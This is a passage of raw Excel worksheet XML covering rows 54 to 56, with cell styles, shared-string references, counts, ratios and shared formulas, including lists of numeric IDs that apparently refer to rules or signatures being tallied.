      <c r="II54" s="99"/>
      <c r="IJ54" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK54" s="99">
        <v>0.0</v>
      </c>
      <c r="IL54" s="99">
        <v>0.0</v>
      </c>
      <c r="IM54" s="121">
        <f t="shared" ref="IM54:IM89" si="97">IL54+IN54</f>
        <v>0</v>
      </c>
      <c r="IN54" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO54" s="98">
        <v>0.0</v>
      </c>
      <c r="IP54" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ54" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR54" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS54" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT54" s="127"/>
      <c r="IU54" s="127"/>
      <c r="IV54" s="127"/>
      <c r="IW54" s="127"/>
      <c r="IX54" s="127"/>
      <c r="IY54" s="127"/>
      <c r="IZ54" s="127"/>
      <c r="JA54" s="127"/>
      <c r="JB54" s="127"/>
      <c r="JC54" s="127"/>
      <c r="JD54" s="127"/>
      <c r="JE54" s="127"/>
      <c r="JF54" s="127"/>
      <c r="JG54" s="127"/>
      <c r="JH54" s="127"/>
      <c r="JI54" s="127"/>
      <c r="JJ54" s="127"/>
      <c r="JK54" s="127"/>
      <c r="JL54" s="127"/>
      <c r="JM54" s="127"/>
      <c r="JN54" s="127"/>
      <c r="JO54" s="127"/>
      <c r="JP54" s="127"/>
      <c r="JQ54" s="127"/>
      <c r="JR54" s="127"/>
      <c r="JS54" s="127"/>
      <c r="JT54" s="127"/>
      <c r="JU54" s="127"/>
      <c r="JV54" s="127"/>
      <c r="JW54" s="127"/>
      <c r="JX54" s="127"/>
      <c r="JY54" s="127"/>
      <c r="JZ54" s="127"/>
      <c r="KA54" s="127"/>
      <c r="KB54" s="127"/>
      <c r="KC54" s="127"/>
      <c r="KD54" s="127"/>
      <c r="KE54" s="127"/>
      <c r="KF54" s="127"/>
      <c r="KG54" s="127"/>
      <c r="KH54" s="127"/>
      <c r="KI54" s="127"/>
      <c r="KJ54" s="127"/>
      <c r="KK54" s="127"/>
      <c r="KL54" s="127"/>
      <c r="KM54" s="127"/>
      <c r="KN54" s="127"/>
      <c r="KO54" s="127"/>
      <c r="KP54" s="127"/>
      <c r="KQ54" s="127"/>
      <c r="KR54" s="127"/>
      <c r="KS54" s="127"/>
      <c r="KT54" s="127"/>
      <c r="KU54" s="127"/>
      <c r="KV54" s="127"/>
      <c r="KW54" s="127"/>
      <c r="KX54" s="127"/>
      <c r="KY54" s="127"/>
      <c r="KZ54" s="127"/>
      <c r="LA54" s="127"/>
      <c r="LB54" s="127"/>
      <c r="LC54" s="127"/>
      <c r="LD54" s="127"/>
      <c r="LE54" s="127"/>
      <c r="LF54" s="127"/>
      <c r="LG54" s="127"/>
      <c r="LH54" s="127"/>
      <c r="LI54" s="127"/>
      <c r="LJ54" s="127"/>
      <c r="LK54" s="127"/>
      <c r="LL54" s="127"/>
      <c r="LM54" s="127"/>
      <c r="LN54" s="127"/>
      <c r="LO54" s="127"/>
      <c r="LP54" s="127"/>
      <c r="LQ54" s="127"/>
      <c r="LR54" s="127"/>
      <c r="LS54" s="127"/>
      <c r="LT54" s="127"/>
      <c r="LU54" s="127"/>
      <c r="LV54" s="127"/>
      <c r="LW54" s="127"/>
      <c r="LX54" s="127"/>
      <c r="LY54" s="127"/>
      <c r="LZ54" s="127"/>
      <c r="MA54" s="127"/>
      <c r="MB54" s="127"/>
      <c r="MC54" s="127"/>
      <c r="MD54" s="127"/>
      <c r="ME54" s="127"/>
      <c r="MF54" s="127"/>
      <c r="MG54" s="127"/>
      <c r="MH54" s="127"/>
      <c r="MI54" s="127"/>
      <c r="MJ54" s="127"/>
      <c r="MK54" s="127"/>
      <c r="ML54" s="127"/>
      <c r="MM54" s="127"/>
      <c r="MN54" s="127"/>
      <c r="MO54" s="127"/>
      <c r="MP54" s="127"/>
      <c r="MQ54" s="127"/>
      <c r="MR54" s="127"/>
      <c r="MS54" s="127"/>
      <c r="MT54" s="127"/>
      <c r="MU54" s="127"/>
      <c r="MV54" s="127"/>
      <c r="MW54" s="127"/>
      <c r="MX54" s="127"/>
      <c r="MY54" s="127"/>
      <c r="MZ54" s="127"/>
      <c r="NA54" s="127"/>
      <c r="NB54" s="127"/>
      <c r="NC54" s="127"/>
      <c r="ND54" s="127"/>
      <c r="NE54" s="127"/>
      <c r="NF54" s="127"/>
      <c r="NG54" s="127"/>
      <c r="NH54" s="127"/>
      <c r="NI54" s="127"/>
      <c r="NJ54" s="127"/>
      <c r="NK54" s="127"/>
      <c r="NL54" s="127"/>
      <c r="NM54" s="127"/>
      <c r="NN54" s="127"/>
      <c r="NO54" s="127"/>
      <c r="NP54" s="127"/>
      <c r="NQ54" s="127"/>
      <c r="NR54" s="127"/>
      <c r="NS54" s="127"/>
      <c r="NT54" s="127"/>
      <c r="NU54" s="127"/>
      <c r="NV54" s="127"/>
      <c r="NW54" s="127"/>
      <c r="NX54" s="127"/>
      <c r="NY54" s="127"/>
    </row>
    <row r="55" ht="153.75" customHeight="1">
      <c r="B55" s="89" t="s">
        <v>951</v>
      </c>
      <c r="C55" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D55" s="90" t="s">
        <v>952</v>
      </c>
      <c r="E55" s="90" t="s">
        <v>1040</v>
      </c>
      <c r="F55" s="90" t="s">
        <v>1041</v>
      </c>
      <c r="G55" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H55" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I55" s="92" t="s">
        <v>1042</v>
      </c>
      <c r="J55" s="92" t="s">
        <v>1062</v>
      </c>
      <c r="K55" s="92" t="s">
        <v>1083</v>
      </c>
      <c r="L55" s="93" t="s">
        <v>375</v>
      </c>
      <c r="M55" s="93">
        <v>77.0</v>
      </c>
      <c r="N55" s="93">
        <v>76.0</v>
      </c>
      <c r="O55" s="93">
        <v>0.0</v>
      </c>
      <c r="P55" s="93">
        <v>76.0</v>
      </c>
      <c r="Q55" s="93">
        <v>76.0</v>
      </c>
      <c r="R55" s="93">
        <v>76.0</v>
      </c>
      <c r="S55" s="93">
        <v>0.0</v>
      </c>
      <c r="T55" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U55" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V55" s="96" t="s">
        <v>1064</v>
      </c>
      <c r="W55" s="96" t="s">
        <v>1065</v>
      </c>
      <c r="X55" s="97" t="s">
        <v>1084</v>
      </c>
      <c r="Y55" s="96" t="s">
        <v>1085</v>
      </c>
      <c r="Z55" s="96" t="s">
        <v>1086</v>
      </c>
      <c r="AA55" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB55" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC55" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD55" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE55" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF55" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG55" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH55" s="99" t="s">
        <v>1047</v>
      </c>
      <c r="AI55" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ55" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK55" s="100" t="s">
        <v>1087</v>
      </c>
      <c r="AL55" s="100">
        <v>3.0</v>
      </c>
      <c r="AM55" s="100">
        <v>3.0</v>
      </c>
      <c r="AN55" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO55" s="100" t="s">
        <v>1088</v>
      </c>
      <c r="AP55" s="100">
        <v>3.0</v>
      </c>
      <c r="AQ55" s="100">
        <v>3.0</v>
      </c>
      <c r="AR55" s="100" t="s">
        <v>1089</v>
      </c>
      <c r="AS55" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT55" s="100" t="str">
        <f t="shared" ref="AT55:AT57" si="98">IF(AR55="-",AS55,AR55)</f>
        <v>1122, 1147</v>
      </c>
      <c r="AU55" s="100" t="s">
        <v>1089</v>
      </c>
      <c r="AV55" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW55" s="100">
        <v>1061.0</v>
      </c>
      <c r="AX55" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY55" s="100">
        <v>1.0</v>
      </c>
      <c r="AZ55" s="100">
        <v>3.0</v>
      </c>
      <c r="BA55" s="102">
        <v>77.0</v>
      </c>
      <c r="BB55" s="102">
        <v>1.0</v>
      </c>
      <c r="BC55" s="102">
        <v>2.0</v>
      </c>
      <c r="BD55" s="102">
        <v>3.0</v>
      </c>
      <c r="BE55" s="102">
        <v>1.0</v>
      </c>
      <c r="BF55" s="102">
        <v>0.0</v>
      </c>
      <c r="BG55" s="102">
        <v>1.0</v>
      </c>
      <c r="BH55" s="102">
        <v>1.0</v>
      </c>
      <c r="BI55" s="102">
        <v>1.0</v>
      </c>
      <c r="BJ55" s="102">
        <v>2.0</v>
      </c>
      <c r="BK55" s="102">
        <v>3.0</v>
      </c>
      <c r="BL55" s="103">
        <f t="shared" si="3"/>
        <v>0.01315789474</v>
      </c>
      <c r="BM55" s="103">
        <f t="shared" si="4"/>
        <v>0.01315789474</v>
      </c>
      <c r="BN55" s="103">
        <f t="shared" si="5"/>
        <v>0.01315789474</v>
      </c>
      <c r="BO55" s="103">
        <f t="shared" si="6"/>
        <v>0.02631578947</v>
      </c>
      <c r="BP55" s="103">
        <f t="shared" si="7"/>
        <v>0.02631578947</v>
      </c>
      <c r="BQ55" s="103">
        <f t="shared" si="8"/>
        <v>0.01315789474</v>
      </c>
      <c r="BR55" s="103">
        <f t="shared" si="9"/>
        <v>0.03947368421</v>
      </c>
      <c r="BS55" s="103">
        <f t="shared" si="10"/>
        <v>0.03947368421</v>
      </c>
      <c r="BT55" s="103">
        <f t="shared" si="11"/>
        <v>0.01315789474</v>
      </c>
      <c r="BU55" s="103">
        <f t="shared" si="75"/>
        <v>0.01315789474</v>
      </c>
      <c r="BV55" s="103">
        <f t="shared" si="76"/>
        <v>1</v>
      </c>
      <c r="BW55" s="104" t="s">
        <v>1090</v>
      </c>
      <c r="BX55" s="104">
        <v>9.0</v>
      </c>
      <c r="BY55" s="104">
        <v>80.0</v>
      </c>
      <c r="BZ55" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA55" s="104" t="s">
        <v>1091</v>
      </c>
      <c r="CB55" s="104">
        <v>9.0</v>
      </c>
      <c r="CC55" s="104">
        <v>80.0</v>
      </c>
      <c r="CD55" s="104" t="s">
        <v>1092</v>
      </c>
      <c r="CE55" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF55" s="104" t="str">
        <f t="shared" si="90"/>
        <v>1122, 1147, 2017808</v>
      </c>
      <c r="CG55" s="104" t="s">
        <v>1092</v>
      </c>
      <c r="CH55" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI55" s="104" t="s">
        <v>1093</v>
      </c>
      <c r="CJ55" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK55" s="104">
        <v>6.0</v>
      </c>
      <c r="CL55" s="104">
        <v>77.0</v>
      </c>
      <c r="CM55" s="105">
        <v>77.0</v>
      </c>
      <c r="CN55" s="105">
        <v>73.0</v>
      </c>
      <c r="CO55" s="105">
        <v>75.0</v>
      </c>
      <c r="CP55" s="105">
        <v>3.0</v>
      </c>
      <c r="CQ55" s="105">
        <v>77.0</v>
      </c>
      <c r="CR55" s="105">
        <v>78.0</v>
      </c>
      <c r="CS55" s="105">
        <v>73.0</v>
      </c>
      <c r="CT55" s="105">
        <v>0.0</v>
      </c>
      <c r="CU55" s="105">
        <v>74.0</v>
      </c>
      <c r="CV55" s="105">
        <v>76.0</v>
      </c>
      <c r="CW55" s="105">
        <v>73.0</v>
      </c>
      <c r="CX55" s="105">
        <v>75.0</v>
      </c>
      <c r="CY55" s="105">
        <v>3.0</v>
      </c>
      <c r="CZ55" s="105">
        <v>77.0</v>
      </c>
      <c r="DA55" s="105">
        <v>78.0</v>
      </c>
      <c r="DB55" s="106">
        <f t="shared" si="15"/>
        <v>0.9605263158</v>
      </c>
      <c r="DC55" s="106">
        <f t="shared" si="16"/>
        <v>0.9605263158</v>
      </c>
      <c r="DD55" s="106">
        <f t="shared" si="17"/>
        <v>0.9605263158</v>
      </c>
      <c r="DE55" s="106">
        <f t="shared" si="18"/>
        <v>0.9868421053</v>
      </c>
      <c r="DF55" s="106">
        <f t="shared" si="19"/>
        <v>0.9868421053</v>
      </c>
      <c r="DG55" s="106">
        <f t="shared" si="20"/>
        <v>0.9736842105</v>
      </c>
      <c r="DH55" s="106">
        <f t="shared" si="21"/>
        <v>1.026315789</v>
      </c>
      <c r="DI55" s="106">
        <f t="shared" si="22"/>
        <v>1.026315789</v>
      </c>
      <c r="DJ55" s="106">
        <f t="shared" si="23"/>
        <v>1</v>
      </c>
      <c r="DK55" s="107">
        <f t="shared" si="77"/>
        <v>0.9605263158</v>
      </c>
      <c r="DL55" s="106">
        <f t="shared" si="78"/>
        <v>1</v>
      </c>
      <c r="DM55" s="108" t="s">
        <v>1094</v>
      </c>
      <c r="DN55" s="108">
        <v>13.0</v>
      </c>
      <c r="DO55" s="108">
        <v>458.0</v>
      </c>
      <c r="DP55" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ55" s="108" t="s">
        <v>1095</v>
      </c>
      <c r="DR55" s="108">
        <v>13.0</v>
      </c>
      <c r="DS55" s="108">
        <v>458.0</v>
      </c>
      <c r="DT55" s="108" t="s">
        <v>1096</v>
      </c>
      <c r="DU55" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV55" s="108" t="str">
        <f t="shared" si="91"/>
        <v>1122, 1147, 2017808, 50447, 31939</v>
      </c>
      <c r="DW55" s="108" t="s">
        <v>1097</v>
      </c>
      <c r="DX55" s="108">
        <v>50447.0</v>
      </c>
      <c r="DY55" s="108" t="s">
        <v>1098</v>
      </c>
      <c r="DZ55" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA55" s="108">
        <v>8.0</v>
      </c>
      <c r="EB55" s="108">
        <v>76.0</v>
      </c>
      <c r="EC55" s="109">
        <v>77.0</v>
      </c>
      <c r="ED55" s="109">
        <v>73.0</v>
      </c>
      <c r="EE55" s="109">
        <v>75.0</v>
      </c>
      <c r="EF55" s="109">
        <v>228.0</v>
      </c>
      <c r="EG55" s="109">
        <v>77.0</v>
      </c>
      <c r="EH55" s="109">
        <v>296.0</v>
      </c>
      <c r="EI55" s="109">
        <v>73.0</v>
      </c>
      <c r="EJ55" s="109">
        <v>0.0</v>
      </c>
      <c r="EK55" s="109">
        <v>75.0</v>
      </c>
      <c r="EL55" s="109">
        <v>76.0</v>
      </c>
      <c r="EM55" s="109">
        <v>73.0</v>
      </c>
      <c r="EN55" s="109">
        <v>75.0</v>
      </c>
      <c r="EO55" s="109">
        <v>228.0</v>
      </c>
      <c r="EP55" s="109">
        <v>77.0</v>
      </c>
      <c r="EQ55" s="109">
        <v>296.0</v>
      </c>
      <c r="ER55" s="110">
        <f t="shared" si="27"/>
        <v>0.9605263158</v>
      </c>
      <c r="ES55" s="110">
        <f t="shared" si="28"/>
        <v>0.9605263158</v>
      </c>
      <c r="ET55" s="110">
        <f t="shared" si="29"/>
        <v>0.9605263158</v>
      </c>
      <c r="EU55" s="110">
        <f t="shared" si="30"/>
        <v>0.9868421053</v>
      </c>
      <c r="EV55" s="110">
        <f t="shared" si="31"/>
        <v>0.9868421053</v>
      </c>
      <c r="EW55" s="110">
        <f t="shared" si="32"/>
        <v>0.9868421053</v>
      </c>
      <c r="EX55" s="110">
        <f t="shared" si="33"/>
        <v>3.894736842</v>
      </c>
      <c r="EY55" s="110">
        <f t="shared" si="34"/>
        <v>3.894736842</v>
      </c>
      <c r="EZ55" s="110">
        <f t="shared" si="35"/>
        <v>1</v>
      </c>
      <c r="FA55" s="110">
        <f t="shared" si="79"/>
        <v>0.9605263158</v>
      </c>
      <c r="FB55" s="110">
        <f t="shared" si="80"/>
        <v>1</v>
      </c>
      <c r="FC55" s="111" t="s">
        <v>1099</v>
      </c>
      <c r="FD55" s="111">
        <v>17.0</v>
      </c>
      <c r="FE55" s="111">
        <v>536.0</v>
      </c>
      <c r="FF55" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG55" s="111" t="s">
        <v>1100</v>
      </c>
      <c r="FH55" s="111">
        <v>15.0</v>
      </c>
      <c r="FI55" s="111">
        <v>379.0</v>
      </c>
      <c r="FJ55" s="111" t="s">
        <v>1101</v>
      </c>
      <c r="FK55" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL55" s="111" t="str">
        <f t="shared" si="95"/>
        <v>1122, 1147, 2017808, 50447, 31939, 2002752, 2002749, 2012885</v>
      </c>
      <c r="FM55" s="111" t="s">
        <v>1102</v>
      </c>
      <c r="FN55" s="111">
        <v>50447.0</v>
      </c>
      <c r="FO55" s="111" t="s">
        <v>1103</v>
      </c>
      <c r="FP55" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ55" s="111">
        <v>10.0</v>
      </c>
      <c r="FR55" s="111">
        <v>156.0</v>
      </c>
      <c r="FS55" s="112">
        <v>77.0</v>
      </c>
      <c r="FT55" s="112">
        <v>75.0</v>
      </c>
      <c r="FU55" s="112">
        <v>78.0</v>
      </c>
      <c r="FV55" s="112">
        <v>228.0</v>
      </c>
      <c r="FW55" s="112">
        <v>155.0</v>
      </c>
      <c r="FX55" s="112">
        <v>300.0</v>
      </c>
      <c r="FY55" s="112">
        <v>73.0</v>
      </c>
      <c r="FZ55" s="112">
        <v>0.0</v>
      </c>
      <c r="GA55" s="112">
        <v>75.0</v>
      </c>
      <c r="GB55" s="112">
        <v>76.0</v>
      </c>
      <c r="GC55" s="112">
        <v>74.0</v>
      </c>
      <c r="GD55" s="112">
        <v>76.0</v>
      </c>
      <c r="GE55" s="112">
        <v>228.0</v>
      </c>
      <c r="GF55" s="112">
        <v>151.0</v>
      </c>
      <c r="GG55" s="112">
        <v>296.0</v>
      </c>
      <c r="GH55" s="113">
        <f t="shared" si="39"/>
        <v>0.9868421053</v>
      </c>
      <c r="GI55" s="113">
        <f t="shared" si="40"/>
        <v>0.9736842105</v>
      </c>
      <c r="GJ55" s="113">
        <f t="shared" si="41"/>
        <v>0.9605263158</v>
      </c>
      <c r="GK55" s="113">
        <f t="shared" si="42"/>
        <v>1.026315789</v>
      </c>
      <c r="GL55" s="113">
        <f t="shared" si="43"/>
        <v>1</v>
      </c>
      <c r="GM55" s="113">
        <f t="shared" si="44"/>
        <v>0.9868421053</v>
      </c>
      <c r="GN55" s="113">
        <f t="shared" si="45"/>
        <v>3.947368421</v>
      </c>
      <c r="GO55" s="113">
        <f t="shared" si="46"/>
        <v>3.894736842</v>
      </c>
      <c r="GP55" s="113">
        <f t="shared" si="47"/>
        <v>1</v>
      </c>
      <c r="GQ55" s="114">
        <f t="shared" si="81"/>
        <v>0.9605263158</v>
      </c>
      <c r="GR55" s="113">
        <f t="shared" si="82"/>
        <v>1</v>
      </c>
      <c r="GS55" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT55" s="94" t="s">
        <v>1104</v>
      </c>
      <c r="GU55" s="116" t="s">
        <v>1105</v>
      </c>
      <c r="GV55" s="116">
        <v>2.0</v>
      </c>
      <c r="GW55" s="116">
        <v>150.0</v>
      </c>
      <c r="GX55" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY55" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ55" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA55" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB55" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC55" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD55" s="131" t="s">
        <v>1105</v>
      </c>
      <c r="HE55" s="131" t="s">
        <v>1105</v>
      </c>
      <c r="HF55" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG55" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH55" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI55" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ55" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK55" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL55" s="93">
        <v>77.0</v>
      </c>
      <c r="HM55" s="93">
        <f t="shared" si="83"/>
        <v>76</v>
      </c>
      <c r="HN55" s="93">
        <v>76.0</v>
      </c>
      <c r="HO55" s="93">
        <v>0.0</v>
      </c>
      <c r="HP55" s="93">
        <v>76.0</v>
      </c>
      <c r="HQ55" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR55" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS55" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT55" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU55" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV55" s="119" t="s">
        <v>1106</v>
      </c>
      <c r="HW55" s="119">
        <v>17.0</v>
      </c>
      <c r="HX55" s="119">
        <v>265.0</v>
      </c>
      <c r="HY55" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ55" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA55" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB55" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC55" s="120" t="s">
        <v>1107</v>
      </c>
      <c r="ID55" s="120" t="s">
        <v>1107</v>
      </c>
      <c r="IE55" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF55" s="120">
        <v>9999.0</v>
      </c>
      <c r="IG55" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH55" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II55" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ55" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK55" s="99">
        <v>77.0</v>
      </c>
      <c r="IL55" s="99">
        <v>76.0</v>
      </c>
      <c r="IM55" s="121">
        <f t="shared" si="97"/>
        <v>76</v>
      </c>
      <c r="IN55" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO55" s="98">
        <v>76.0</v>
      </c>
      <c r="IP55" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ55" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR55" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS55" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT55" s="127"/>
      <c r="IU55" s="127"/>
      <c r="IV55" s="127"/>
      <c r="IW55" s="127"/>
      <c r="IX55" s="127"/>
      <c r="IY55" s="127"/>
      <c r="IZ55" s="127"/>
      <c r="JA55" s="127"/>
      <c r="JB55" s="127"/>
      <c r="JC55" s="127"/>
      <c r="JD55" s="127"/>
      <c r="JE55" s="127"/>
      <c r="JF55" s="127"/>
      <c r="JG55" s="127"/>
      <c r="JH55" s="127"/>
      <c r="JI55" s="127"/>
      <c r="JJ55" s="127"/>
      <c r="JK55" s="127"/>
      <c r="JL55" s="127"/>
      <c r="JM55" s="127"/>
      <c r="JN55" s="127"/>
      <c r="JO55" s="127"/>
      <c r="JP55" s="127"/>
      <c r="JQ55" s="127"/>
      <c r="JR55" s="127"/>
      <c r="JS55" s="127"/>
      <c r="JT55" s="127"/>
      <c r="JU55" s="127"/>
      <c r="JV55" s="127"/>
      <c r="JW55" s="127"/>
      <c r="JX55" s="127"/>
      <c r="JY55" s="127"/>
      <c r="JZ55" s="127"/>
      <c r="KA55" s="127"/>
      <c r="KB55" s="127"/>
      <c r="KC55" s="127"/>
      <c r="KD55" s="127"/>
      <c r="KE55" s="127"/>
      <c r="KF55" s="127"/>
      <c r="KG55" s="127"/>
      <c r="KH55" s="127"/>
      <c r="KI55" s="127"/>
      <c r="KJ55" s="127"/>
      <c r="KK55" s="127"/>
      <c r="KL55" s="127"/>
      <c r="KM55" s="127"/>
      <c r="KN55" s="127"/>
      <c r="KO55" s="127"/>
      <c r="KP55" s="127"/>
      <c r="KQ55" s="127"/>
      <c r="KR55" s="127"/>
      <c r="KS55" s="127"/>
      <c r="KT55" s="127"/>
      <c r="KU55" s="127"/>
      <c r="KV55" s="127"/>
      <c r="KW55" s="127"/>
      <c r="KX55" s="127"/>
      <c r="KY55" s="127"/>
      <c r="KZ55" s="127"/>
      <c r="LA55" s="127"/>
      <c r="LB55" s="127"/>
      <c r="LC55" s="127"/>
      <c r="LD55" s="127"/>
      <c r="LE55" s="127"/>
      <c r="LF55" s="127"/>
      <c r="LG55" s="127"/>
      <c r="LH55" s="127"/>
      <c r="LI55" s="127"/>
      <c r="LJ55" s="127"/>
      <c r="LK55" s="127"/>
      <c r="LL55" s="127"/>
      <c r="LM55" s="127"/>
      <c r="LN55" s="127"/>
      <c r="LO55" s="127"/>
      <c r="LP55" s="127"/>
      <c r="LQ55" s="127"/>
      <c r="LR55" s="127"/>
      <c r="LS55" s="127"/>
      <c r="LT55" s="127"/>
      <c r="LU55" s="127"/>
      <c r="LV55" s="127"/>
      <c r="LW55" s="127"/>
      <c r="LX55" s="127"/>
      <c r="LY55" s="127"/>
      <c r="LZ55" s="127"/>
      <c r="MA55" s="127"/>
      <c r="MB55" s="127"/>
      <c r="MC55" s="127"/>
      <c r="MD55" s="127"/>
      <c r="ME55" s="127"/>
      <c r="MF55" s="127"/>
      <c r="MG55" s="127"/>
      <c r="MH55" s="127"/>
      <c r="MI55" s="127"/>
      <c r="MJ55" s="127"/>
      <c r="MK55" s="127"/>
      <c r="ML55" s="127"/>
      <c r="MM55" s="127"/>
      <c r="MN55" s="127"/>
      <c r="MO55" s="127"/>
      <c r="MP55" s="127"/>
      <c r="MQ55" s="127"/>
      <c r="MR55" s="127"/>
      <c r="MS55" s="127"/>
      <c r="MT55" s="127"/>
      <c r="MU55" s="127"/>
      <c r="MV55" s="127"/>
      <c r="MW55" s="127"/>
      <c r="MX55" s="127"/>
      <c r="MY55" s="127"/>
      <c r="MZ55" s="127"/>
      <c r="NA55" s="127"/>
      <c r="NB55" s="127"/>
      <c r="NC55" s="127"/>
      <c r="ND55" s="127"/>
      <c r="NE55" s="127"/>
      <c r="NF55" s="127"/>
      <c r="NG55" s="127"/>
      <c r="NH55" s="127"/>
      <c r="NI55" s="127"/>
      <c r="NJ55" s="127"/>
      <c r="NK55" s="127"/>
      <c r="NL55" s="127"/>
      <c r="NM55" s="127"/>
      <c r="NN55" s="127"/>
      <c r="NO55" s="127"/>
      <c r="NP55" s="127"/>
      <c r="NQ55" s="127"/>
      <c r="NR55" s="127"/>
      <c r="NS55" s="127"/>
      <c r="NT55" s="127"/>
      <c r="NU55" s="127"/>
      <c r="NV55" s="127"/>
      <c r="NW55" s="127"/>
      <c r="NX55" s="127"/>
      <c r="NY55" s="127"/>
    </row>
    <row r="56" ht="153.75" customHeight="1">
      <c r="B56" s="89" t="s">
        <v>633</v>
      </c>
      <c r="C56" s="90" t="s">
        <v>664</v>
      </c>
      <c r="D56" s="90" t="s">
        <v>635</v>
      </c>
      <c r="E56" s="90" t="s">
        <v>1108</v>
      </c>
      <c r="F56" s="90" t="s">
        <v>1109</v>
      </c>
      <c r="G56" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H56" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I56" s="92" t="s">
        <v>1110</v>
      </c>
      <c r="J56" s="92" t="s">
        <v>1111</v>
      </c>
      <c r="K56" s="92" t="s">
        <v>1112</v>
      </c>
      <c r="L56" s="93" t="s">
        <v>317</v>
      </c>
      <c r="M56" s="93">
        <v>27.0</v>
      </c>
      <c r="N56" s="93">
        <v>9.0</v>
      </c>
      <c r="O56" s="93">
        <v>2.0</v>
      </c>
      <c r="P56" s="93">
        <v>16.0</v>
      </c>
      <c r="Q56" s="93">
        <f t="shared" ref="Q56:Q58" si="99">R56+S56</f>
        <v>18</v>
      </c>
      <c r="R56" s="93">
        <v>16.0</v>
      </c>
      <c r="S56" s="93">
        <v>2.0</v>
      </c>
      <c r="T56" s="94" t="s">
        <v>1113</v>
      </c>
      <c r="U56" s="98" t="s">
        <v>224</v>
      </c>
      <c r="V56" s="126" t="s">
        <v>1114</v>
      </c>
      <c r="W56" s="96" t="s">
        <v>1115</v>
      </c>
      <c r="X56" s="132" t="s">
        <v>1116</v>
      </c>
      <c r="Y56" s="126" t="s">
        <v>1117</v>
      </c>
      <c r="Z56" s="132" t="s">
        <v>1118</v>
      </c>
      <c r="AA56" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB56" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC56" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD56" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE56" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF56" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG56" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH56" s="99" t="s">
        <v>1119</v>
      </c>
      <c r="AI56" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ56" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK56" s="100">
        <v>1917.0</v>
      </c>
      <c r="AL56" s="100">
        <v>1.0</v>
      </c>
      <c r="AM56" s="100">
        <v>8.0</v>
      </c>
      <c r="AN56" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO56" s="100">
        <v>1917.0</v>
      </c>
      <c r="AP56" s="100">
